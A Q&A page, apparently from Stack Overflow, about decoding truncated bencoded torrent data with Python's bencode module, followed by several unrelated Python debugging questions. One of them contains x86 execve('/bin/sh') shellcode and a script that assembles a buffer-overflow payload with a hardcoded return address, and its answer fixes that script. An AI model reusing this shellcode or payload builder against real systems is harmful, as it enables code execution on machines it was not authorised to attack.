How to decode bencoded torrent data - python

I'm trying to extract the size and name from a torrent file by decoding its content with bencode.
I ran pip install bencode and then tested it with one line of a torrent file, as you can see below.
import bencode
blabla = 'd8:announce70:http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce7:comment29:https://www.t411.io/t/524280210:created by19:https://www.t411.io13:creation datei1431685353e4:infod6:lengthi14634059e4:name22:Charlie-Hebdo-1178.pdf12:piece lengthi262144e6:pieces1120:'
myprint = bencode.decode_string(blabla,1)
print myprint
This is the file that pip install put in the python lib:
from BTL import BTFailure
def decode_int(x, f):
    """Decode a bencoded integer (``i<digits>e``) whose ``'i'`` is at ``x[f]``.

    Args:
        x: The bencoded data.
        f: Index of the leading ``'i'`` marker.

    Returns:
        A ``(value, next_offset)`` tuple; ``next_offset`` is the index just
        past the terminating ``'e'``.

    Raises:
        ValueError: If there is no terminating ``'e'``, the digits are not a
            valid integer, the number starts with ``-0``, or it has a
            leading zero (``i0e`` itself is accepted).
    """
    f += 1  # skip the 'i' marker
    newf = x.index('e', f)
    n = int(x[f:newf])
    if x[f] == '-':
        # A minus sign followed by '0' is rejected.
        if x[f + 1] == '0':
            raise ValueError
    elif x[f] == '0' and newf != f+1:
        # A leading zero is only allowed when the number is exactly "0".
        raise ValueError
    return (n, newf+1)
def decode_string(x, f):
    """Decode a bencoded string (``<length>:<data>``) that starts at ``x[f]``.

    Args:
        x: The bencoded data.
        f: Index of the first digit of the length prefix.

    Returns:
        A ``(string, next_offset)`` tuple; ``next_offset`` is the index just
        past the string's last character.

    Raises:
        ValueError: If no ``':'`` follows, the length prefix is not an
            integer, or the length has a leading zero.

    Note:
        The payload is taken with a slice, so truncated input is not
        detected here: fewer than ``length`` remaining characters yield a
        shorter string and an offset past the end of ``x``.
    """
    colon = x.index(':', f)
    n = int(x[f:colon])
    if x[f] == '0' and colon != f+1:
        # A leading zero is only allowed for the empty string "0:".
        raise ValueError
    colon += 1  # step over ':' to the first payload character
    return (x[colon:colon+n], colon+n)
def decode_list(x, f):
    """Decode a bencoded list (``l<items>e``) whose ``'l'`` is at ``x[f]``.

    Each item is decoded by the function that ``decode_func`` registers for
    the item's first character.

    Args:
        x: The bencoded data.
        f: Index of the leading ``'l'`` marker.

    Returns:
        A ``(list, next_offset)`` tuple; ``next_offset`` is the index just
        past the terminating ``'e'``.

    Raises:
        IndexError: If the data ends before the terminating ``'e'``.
        KeyError: If an item starts with a character that has no decoder.
    """
    r, f = [], f+1
    while x[f] != 'e':
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)
def decode_dict(x, f):
    """Decode a bencoded dictionary (``d<key><value>...e``) at ``x[f]``.

    Keys are always decoded with ``decode_string``; each value is decoded by
    the function that ``decode_func`` registers for its first character.

    Args:
        x: The bencoded data.
        f: Index of the leading ``'d'`` marker.

    Returns:
        A ``(dict, next_offset)`` tuple; ``next_offset`` is the index just
        past the terminating ``'e'``.

    Raises:
        IndexError: If the data ends before the terminating ``'e'``.
        KeyError: If a value starts with a character that has no decoder.
        ValueError: If a key is not a well-formed bencoded string.
    """
    r, f = {}, f+1
    while x[f] != 'e':
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)
# Dispatch table: the first character of an encoded value selects its decoder.
decode_func = {
    'l': decode_list,
    'd': decode_dict,
    'i': decode_int,
}
# A string starts with its decimal length, so every digit maps to decode_string.
decode_func.update(dict.fromkeys('0123456789', decode_string))
def bdecode(x):
    """Decode a complete bencoded value.

    Args:
        x: The bencoded data; it must contain exactly one top-level value.

    Returns:
        The decoded object, as produced by the decoder registered in
        ``decode_func`` for the first character of ``x``.

    Raises:
        BTFailure: If decoding raises ``IndexError``, ``KeyError`` or
            ``ValueError`` (for example empty or truncated input), or if
            data remains after the first complete value.
    """
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        raise BTFailure("not a valid bencoded string")
    # The decoder returns the offset just past the value; anything left over
    # means the input holds more than a single bencoded value.
    if l != len(x):
        raise BTFailure("invalid bencoded value (data after valid prefix)")
    return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType
class Bencached(object):
    """Wrapper around data that is already bencoded.

    ``encode_bencached`` appends the wrapped value to the output as-is.
    """

    # Only one attribute is ever stored, so no per-instance __dict__ is needed.
    __slots__ = ['bencoded']

    def __init__(self, s):
        """Store ``s``, the already-bencoded data."""
        self.bencoded = s
def encode_bencached(x,r):
    """Append the pre-encoded payload ``x.bencoded`` to the output list ``r``."""
    r.append(x.bencoded)
def encode_int(x, r):
    """Append the bencoding of integer ``x`` (``i<digits>e``) to the list ``r``."""
    r.extend(('i', str(x), 'e'))
def encode_bool(x, r):
    """Append the bencoding of boolean ``x`` to ``r`` as integer 1 or 0."""
    if x:
        encode_int(1, r)
    else:
        encode_int(0, r)
def encode_string(x, r):
    """Append the bencoding of string ``x`` (``<length>:<data>``) to ``r``."""
    r.extend((str(len(x)), ':', x))
def encode_list(x, r):
    """Append the bencoding of sequence ``x`` (``l<items>e``) to ``r``.

    Each item is encoded by the function that ``encode_func`` registers for
    its exact type; an unregistered type raises ``KeyError``.
    """
    r.append('l')
    for i in x:
        encode_func[type(i)](i, r)
    r.append('e')
def encode_dict(x,r):
    """Append the bencoding of dict ``x`` (``d<key><value>...e``) to ``r``.

    Entries are written in sorted key order. Keys are written as bencoded
    strings; each value is encoded by the function that ``encode_func``
    registers for its exact type (an unregistered type raises ``KeyError``).
    """
    r.append('d')
    # sorted() gives the same order as sorting the items list in place, and
    # also works where items() returns a view that has no .sort() method.
    for k, v in sorted(x.items()):
        r.extend((str(len(k)), ':', k))
        encode_func[type(v)](v, r)
    r.append('e')
# Dispatch table: the exact type of a value selects its encoder.
encode_func = {}
encode_func[Bencached] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
# Booleans are registered only when the types module provides BooleanType.
try:
    from types import BooleanType
    encode_func[BooleanType] = encode_bool
except ImportError:
    pass
def bencode(x):
    """Return the bencoded form of ``x`` as a single string.

    The encoder is looked up in ``encode_func`` by the exact type of ``x``;
    an unregistered type raises ``KeyError``.
    """
    r = []  # encoders append fragments here; they are joined once at the end
    encode_func[type(x)](x, r)
    return ''.join(r)
The problem is that I don't really understand how to decode my line with this bencode module.
I already tried the bdecode function, but this is the output:
root#debian:/home/florian/Téléchargements# python decript.py
Traceback (most recent call last):
File "decript.py", line 4, in <module>
myprint = bencode.bdecode(blabla)
File "/usr/local/lib/python2.7/dist-packages/bencode/__init__.py", line 68, in bdecode
raise BTFailure("not a valid bencoded string")
bencode.BTL.BTFailure: not a valid bencoded string
So I tried the decode_string function, but decode_string(blabla, 1) decodes only the first word:
root#debian:/home/florian/Téléchargements# python decript.py
('announce', 11)
and other offsets such as 2, 3 or 4 don't work and produce errors like this one:
root#debian:/home/florian/Téléchargements# python decript.py
Traceback (most recent call last):
File "decript.py", line 4, in <module>
myprint = bencode.decode_string(blabla,10)
File "/usr/local/lib/python2.7/dist-packages/bencode/__init__.py", line 29, in decode_string
n = int(x[f:colon])
ValueError: invalid literal for int() with base 10: 'e70'
I want to decode the whole line, and I don't understand how to do that with this bencode module.

The string you're trying to decode seems to be truncated. It ends in pieces1120:, indicating that at least 1120 bytes should follow.
BEncoding is a binary format. It's only partially human-readable and not meant to be embedded in charset-sensitive things such as source code files. I suggest you read it straight from a file.

You have an incomplete Bencoded string.
The first part tells you there is a dictionary:
d...
which is supposed to be parsed until there is an e character. There is no such character in your input string.
A manual parse shows you have the keys announce, comment, created by, creation date, and info, where the latter is a nested dictionary with length, name, piece length and pieces. Then your string stops; there is no value for pieces, and no e to mark the end of either the outer dictionary or the nested info dictionary. All we have is the type and length indicator: 1120.
You could try and use the decoding functions directly, but then take into account that they return the value and the offset:
>>> bencode.decode_string(blabla, 1)
('announce', 11)
11 is the offset for the next value:
>>> bencode.decode_string(blabla, 11)
('http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce', 84)
and 84 is again the next:
>>> bencode.decode_string(blabla, 84)
('comment', 93)
If you take into account that the string is incomplete and that not all encoded objects are strings, you can still decode what little is there.
The offset also tells you what function to use for decoding:
>>> blabla[1]
'8'
>>> bencode.decode_func[blabla[1]]
<function decode_string at 0x1004632a8>
The number here spells out how many characters to expect. So skipping the failing d dictionary mapping you get:
>>> offset = 1
>>> while True:
... value, offset = bencode.decode_func[blabla[offset]](blabla, offset)
... print value
...
announce
http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce
comment
https://www.t411.io/t/5242802
created by
https://www.t411.io
creation date
1431685353
info
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "/Users/mj/Development/venvs/stackoverflow-2.7/lib/python2.7/site-packages/bencode/__init__.py", line 44, in decode_dict
while x[f] != 'e':
IndexError: string index out of range
which fails because you hit the nested dictionary without e. You could extract those keys too, by adding one to the last offset:
>>> offset
194
>>> blabla[offset]
'd'
>>> offset += 1
>>> while True:
... value, offset = bencode.decode_func[blabla[offset]](blabla, offset)
... print value
...
length
14634059
name
Charlie-Hebdo-1178.pdf
piece length
262144
pieces
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
IndexError: string index out of range
Or you could just read the data as binary data and not truncate it:
# Read the whole .torrent file in binary mode and decode it in one go.
with open(torrentfilename, 'rb') as torrentfile:
    torrent = bencode.bdecode(torrentfile.read())
# now you have a dictionary.

Related

How to get around "source code string cannot contain null bytes" when eval is run without removing the null bytes

I have a program where I encrypt class.__dict__ and save it to a file in an array so the file looks something like this -
{'some name':[1, 2, 3],
'data':'''𚶩9È𚵶𚶛𚵝X§Ë¡¡Ö©𚶕 î𚶣o𚶥[𚵶𚶎 y𚵽𚵮^𚵜𚶩5Ð¥"¢§«!𚵩𚶅𚶚𚵰fa¥𚶯m𚵬c𚶮^𚵵W𚵴𚶭''' #somthing like this but a lot longer
}
I then read it back and need to decrypt the data, but before that I need to turn the file content, which is currently a string, back into a dictionary. I did that with eval(fileContent), and it gives me this error:
Traceback (most recent call last):
File "C:/Users/stemb/Documents/programing/python/programs/img editor/__init__.py", line 127, in
<module>
main()
File "C:/Users/stemb/Documents/programing/python/programs/img editor/__init__.py", line 102, in main
save_code.auto_save_load()
File "C:\Users\stemb\Documents\programing\python\programs\img editor\save_code.py", line 153, in
auto_save_load
data = eval(fileContent)
ValueError: source code string cannot contain null bytes
My reading function is this
data = open("./save." + GLOBAL.fileType, "r", encoding="utf-8").read()
json.loads gives json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 1 column 2 (char 1)
My code is -
# imports
import json
import random
import time
print("Finished save_progress imports")
def encrypt(obj, log=0): #encrypt
# set data
data = str(obj.__dict__)
key = "codeAsciEightAndMabyA_Seven" + str(time.time()) # crate key
key = list(key)
random.shuffle(key) # randomize key
cryptionKeys = list()
encrypted = list()
iMinus = 0
for i in range(len(data)): # create a random + or - for extra security
cryptionKeys.append(random.choice(("+", "-")))
# encode part
for i, c in enumerate(data):
# set individual data
charAsci = ord(c)
cryptionKey = cryptionKeys[i]
done = 0
while done == 0:
try:
charKey = ord(key[i - iMinus])
done = 1
except IndexError:
iMinus += len(key)
if cryptionKey == "+":
encryptedOrd = charAsci + charKey
else:
encryptedOrd = charAsci - charKey
if encryptedOrd < 0:
encryptedOrd += 110000
cryptionKeys[i] = "="
cryptionKey = cryptionKeys[i]
encryptedChar = chr(encryptedOrd)
encrypted.append(encryptedChar)
if log == 1:
print("charNumb \/")
print(i)
print("charAsci \/")
print(charAsci)
print("cryptionKey \/")
print(cryptionKey)
print("charKey \/")
print(charKey)
print("encryptedOrd \/")
print(encryptedOrd)
print("encryptedChar \/")
print(encryptedChar)
print()
encrypted2 = encrypted
encrypted = ""
for c in encrypted2:
encrypted += c
return str(encrypted), str(key), str(cryptionKeys)
def auto_save(GLOBAL): # the save func
file = open("./save." + GLOBAL.fileType, "w", encoding="utf-8")
encryptedGLOBAL, key, cryptionKeys = encrypt(GLOBAL)
out = ("{'key':" + str(key) + ", 'cryptionKeys':" + str(cryptionKeys) + ", 'data':'''" + str(
encryptedGLOBAL) + "'''}")
print(out)
file.write(out)
file.close()
def auto_save_load(aclass): # the loading dunc
data = open("./save." + GLOBAL.fileType, "r", encoding="utf-8").read()
data = eval(data)
key = data["key"]
cryptionKeys = data["cryptionKeys"]
encryptedGLOBAL = data["data"]
print(key)
print()
print(cryptionKeys)
print()
print(encryptedGLOBAL)
Other answers have said to remove the null bytes but the encryption method needs them.
Please help.

How to write byte-list to file Python?

I have a list of bytes that I want to write as a binary file:
This is what I have:
import struct as st
shellcode = bytearray("\xeb\x1f\x5e\x89\x76\x08\x31"+
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"+
"\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"+
"\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")
def generateexploitmessage(nops, retaddr):
message = []
for x in xrange(0,128):
message += st.pack(">I",retaddr)
print(message)
for x in xrange(0,len(shellcode)):
message[x] = shellcode[x]
print(message)
print(len(message))
return message
def reversebyteorder(arg):
returnarray = []
for x in xrange(0,len(arg),4):
temparray = bytearray(arg[x:x+4])[::-1]
print temparray
returnarray += temparray
return returnarray
def writebytestofile(message):
f = open("pyexploit.bin",'wb')
print message
f.write(message)
f.close()
def main():
print shellcode
exploit =generateexploitmessage(0,0xbffff614)
readyexploit = reversebyteorder(exploit)
writebytestofile(readyexploit)
if __name__ == '__main__':
main()
The error message I'm getting is the following:
Traceback (most recent call last):
File "generateexploit.py", line 47, in <module>
main()
File "generateexploit.py", line 43, in main
writebytestofile(readyexploit)
File "generateexploit.py", line 35, in writebytestofile
f.write(message)
TypeError: argument 1 must be string or buffer, not list
I understand that I somehow need to convert my list to a writable format, but I have no idea how. I have tried putting bytearray(message) where I write the final message to the file, but that didn't help.
Both generateexploitmessage() and reversebyteorder() produce a list of bytes (integers), not a bytearray. Wrap the result in a bytearray() again before writing:
f.write(bytearray(message))
Alternatively, stick to producing a bytearray earlier; there is no need to use lists here:
def generateexploitmessage(nops, retaddr):
message = bytearray()
for x in xrange(128):
message += st.pack(">I", retaddr)
message[:len(shellcode)] = shellcode
return message
def reversebyteorder(arg):
returnarray = bytearray()
for x in xrange(0, len(arg), 4):
temparray = bytearray(arg[x:x + 4])[::-1]
returnarray += temparray
return returnarray

ValueError: dictionary update sequence element #6 has length 1; 2 is required

I have some Python code meant to take some data and recreate a string from that data, but I'm receiving an error.
def remove_cruft(s):
return s[1:-2]
import re
filetouse = input("What file would you like to use?\n>>>")
filetouse = filetouse + ".txt"
f = open(filetouse,"r")
lines = f.readlines()
indexlist = lines[2]
indexdict = lines[1]
indexdict = indexdict.split()
indexdict.remove("['")
indexdict.remove("']")
for item in indexdict:
if "'," in indexdict:
indexdict.remove("',")
if "'" in indexdict:
indexdict.remove("'")
if '",' in indexdict:
indexdict.remove('",')
if '"' in indexdict:
indexdict.remove('"')
indexdict = str(indexdict)
indexdict = indexdict[1:-1]
indexdict.replace(" ", "")
dict(x.split('=') for x in indexdict.split(','))
print(indexlist)
print(indexdict)
newindexlist = remove_cruft(indexlist)
newindexlist = re.findall(r"[\w']+|[.,!?;]", newindexlist)
del newindexlist[1::2]
print(newindexlist)
posindexdict = 0
finaloutput = []
print(finaloutput)
Error:
Traceback (most recent call last):
File "\\IOTA\ControlledAssessment\assess87\My Documents\Python\Task 3\Decompression v1.3.py", line 31, in <module>
dict(x.split('=') for x in indexdict.split(','))
ValueError: dictionary update sequence element #6 has length 1; 2 is required
One of the parameter options for dict is an iterable of iterables of which each has exactly two objects:
>>> dict((('a', 1), ('b', 1)))
{'a': 1, 'b': 1}
Your code is trying to pass in an iterable where one of the sub iterables has only one object:
>>> dict((('a', 1), ('b')))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: dictionary update sequence element #1 has length 1; 2 is required
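Based on the output, it seems that the 7th element in your data (element #6, counting from zero) is not in the format you expect: it contains no '=' to split on, so x.split('=') returns a single item instead of a key/value pair.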

Trouble iterating through lines in a file in Python

I have a class that simulates a scenario for calculating paths in a network using the distance vector routing algorithm. The class has an attribute, map_file, which is the name of a file that describes the connections in the network. Here is a snippet of code from the DVSimulator class:
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f:
data = line.split()
length_of_link = data[2]
...
There is a file called "test_map1". It looks like this:
A B 2.1
B C 1.2
A C 1.0
C D 1.5
Every line in the file indicates a connection between two nodes. Here, Node A is connected to Node B with a distance of 2.1, Node B to Node C with a distance of 1.2, etc.
Here is the setUp() method from my pyunit TestDVSimulator class:
def setUp(self):
self.split_horizon_simulator1 = dv_simulator.DVSimulator("test_map1",True)
self.no_split_simulator1 = dv_simulator.DVSimulator("test_map1", False)
self.split_horizon_simulator2 = dv_simulator.DVSimulator("test_map2",True)
self.no_split_simulator2 = dv_simulator.DVSimulator("test_map2",True)
Here is a snippet of code from the test_populate_map() method in the TestDVSimulator class:
def test_populate_map(self):
"""Tests the populate_map() method in DVSimulator"""
splitty1 = self.split_horizon_simulator1
no_splitty1 = self.no_split_simulator1
splitty2 = self.split_horizon_simulator2
no_splitty2 = self.no_split_simulator2
splitty1.populate_map()
no_splitty1.populate_map()
splitty2.populate_map()
splitty2.populate_map()
...
Now, when I try to unittest the populate_map() method using the map_file shown above I get the following error message:
ERROR: Tests the populate_map() method in DVSimulator
----------------------------------------------------------------------
Traceback (most recent call last):
File "dv_simulator_test.py", line 28, in test_populate_map
splitty1.populate_map()
File "/home/grads/klepp/6760/DistanceVectorProject/dv_simulator.py", line 33, in populate_map
length_of_link = data[2]
IndexError: list index out of range
However, I know that each line in the file has length 3, and so data[2] is most definitely not out of range. Interestingly, if I edit the populate_map() method as follows:
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f.readlines():
print "line from map file: " + line
data = line.split()
print "data: " + str(data)
print str(data[0])
print str(data[1])
print str(data[2])
length_of_link = data[2]
...
the output looks like this:
line from map file: A B 2.1
data: ['A', 'B', '2.1']
A
B
2.1
line from map file: B C 1.2
data: ['B', 'C', '1.2']
B
C
1.2
line from map file: A C 1.0
data: ['A', 'C', '1.0']
A
C
1.0
line from map file: C D 1.5
data: ['C', 'D', '1.5']
C
D
1.5
line from map file:
data: []
EF
======================================================================
ERROR: Tests the populate_map() method in DVSimulator
----------------------------------------------------------------------
Traceback (most recent call last):
File "dv_simulator_test.py", line 28, in test_populate_map
splitty1.populate_map()
File "/home/grads/klepp/6760/DistanceVectorProject/dv_simulator.py", line 30, in populate_map
print str(data[0])
IndexError: list index out of range
That is to say, that str(data[0]) clearly prints out some value, in fact it prints it out four times in a row, but then it says that data[0] is out of range nonetheless. For some reason the code seems to be iterating through the lines in the file and calling line.split() on each line before it runs the line of code for length_of_link = data[2].
Does anyone know what is going wrong and how I can fix this?
Here is the full script of the populate_map() method in the DVSimulator class:
#The DVSimulator class simulates a Distance Vector Routing scenario
import routingtable
import dv_router
class DVSimulator:
def __init__(self, map_file, split_horizon,verbosity = False, test_destination=''):
self.routers_dictionary = {}
self.neighbors_dictionary = {} #a dictionary of router:dict pairs where dict is a dictionary of router values keyed by their names
self.breakables = [] #string tuples of (router1, router2) signifying a link to break upon convergence
self.using_split_horizon = split_horizon
self.map_file = map_file
self.verbose = verbosity
self.number_of_iterations = 0
self.test_dest = test_destination
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f:
print "line from map file: " + line
data = line.split()
print "data: " + str(data)
print str(data[0])
print str(data[1])
print str(data[2])
length_of_link = data[2]
if len(data) == 4:
breakables.append((data[0],data[1]))
router1 = data[0]
router2 = data[1]
neighbor_pair = [router1, router2]
for each in neighbor_pair:
if each == router1:
other = router2
else:
other = router1
if each not in self.routers_dictionary:
self.routers_dictionary[each] = dv_router.DVRouter(each, self.using_split_horizon)
self.neighbors_dictionary[each] = {}
for router in self.routers_dictionary:
if router != other:
self.routers_dictionary[router].add_link(each)
self.routers_dictionary[each].routing_table.edit_distance_to(each, 0, each)
for each in neighbor_pair:
if each == router1:
other = router2
else:
other = router1
self.routers_dictionary[each].add_link(other,length_of_link)
self.neighbors_dictionary[each][other] = self.routers_dictionary[other]
The error lies in the test_map1 file. At the end of the file is a blank line. If the line is removed, the code runs as expected. An if statement, as suggested, could also be added to branch correctly for blank lines.

Positional Inverted Index in Python

I recently developed a Python program that makes an inverted index out of terms in a certain document. I now want to create position postings, such as
to, 993427:
⟨ 1, 6: ⟨7, 18, 33, 72, 86, 231⟩;
2, 5: ⟨1, 17, 74, 222, 255⟩; 4, 5: ⟨8, 16, 190, 429, 433⟩; 5, 2: ⟨363, 367⟩;
7, 3: ⟨13, 23, 191⟩; …⟩
I know the code is not complete as described above, I'm just trying to implement functionality.
from pprint import pprint as pp
from collections import Counter
import pprint
import re
import sys
import string
import fileinput
try:
reduce
except:
from functools import reduce
try:
raw_input
except:
raw_input = input
def readIn(fileglob): #Reads in multiple files and strips punctation/uppercase.
texts, words = {}, set()
for txtfile in (fileglob):
with open(txtfile, 'r') as splitWords:
txt = splitWords.read().lower().split()
txt = str(txt)
txt = re.findall(r'\w+', txt)
words |= set(txt)
texts[txtfile.split('\\')[-1]] = txt
return texts, words
def search(indexes): # Inverted index, based off the book and the web.
return reduce(set.intersection,
(index[word] for word in indexes),
set(texts.keys()))
def getWordBins(posOfWords):
cnt = Counter()
for word in posOfWords:
cnt[posOfWords] += 1
return cnt
def main(fileList, topWords):
tempArray = []
for x in range(1,len(fileList)):
tempArray.append(fileList[x])
texts, words = readIn(tempArray)
index = {word:set(txt
for txt, wrds in texts.items() if word in wrds)
for word in words}
test =({k + " " + str(len(v)) + " " + str(sorted(v)) for k,v in index.items()})
txt = readIn(fileList)
posWord = getWordBins(txt)
for key, value in posWord.most_common(topWords):
print key, value
#Writes out the information requested to a ".idx" file.
doc = open("document.idx", "w")
doc.write("# INPUT DOCUMENT REFERENCE LEGEND\n")
for fileNumber in range(1, len(fileList)):
doc.write(str(fileNumber) + "\t" + fileList[fileNumber] + "\n")
doc.write("# INVERTED INDEX RESULTS\n")
tempTest = []
for x in test:
tempTest.append(x.split(" "))
for x in tempTest:
tempStr = ""
for y in x:
tempStr += y + "\t"
doc.write(tempStr + "\n")
doc.close
main(sys.argv, sys.argv)
This is what I have so far, the only new functionality is the getWordBins function, and the loop:
txt = readIn(fileList)
posWord = getWordBins(txt)
for key, value in posWord.most_common(topWords):
print key, value
Now, what happens when I try to run the code is this:
Traceback (most recent call last):
File "Intro3.py", line 82, in <module>
main(sys.argv, sys.argv)
File "Intro3.py", line 60, in main
posWord = getWordBins(txt)
File "Intro3.py", line 41, in getWordBins
cnt[posOfWords] += 1
TypeError: unhashable type: 'dict'
Any guidance with this troubling error is gladly received. It is not a dictionary, so why the error?
Thanks for your time!
Where you're doing:
cnt[posOfWords] += 1
I think you might mean:
cnt[word] += 1
Your readIn function also returns a dict and a set, so your txt variable is a tuple of (dict, set).
So your problem boils down to trying to use a tuple holding a dict as a key (which I doubt is your intent). And it wouldn't work for cnt[word] += 1, because that would still be trying to use a dict as a key too. You need to do this, probably:
txt, _ = readIn(fileList)
and then this might work:
cnt[word] += 1

Categories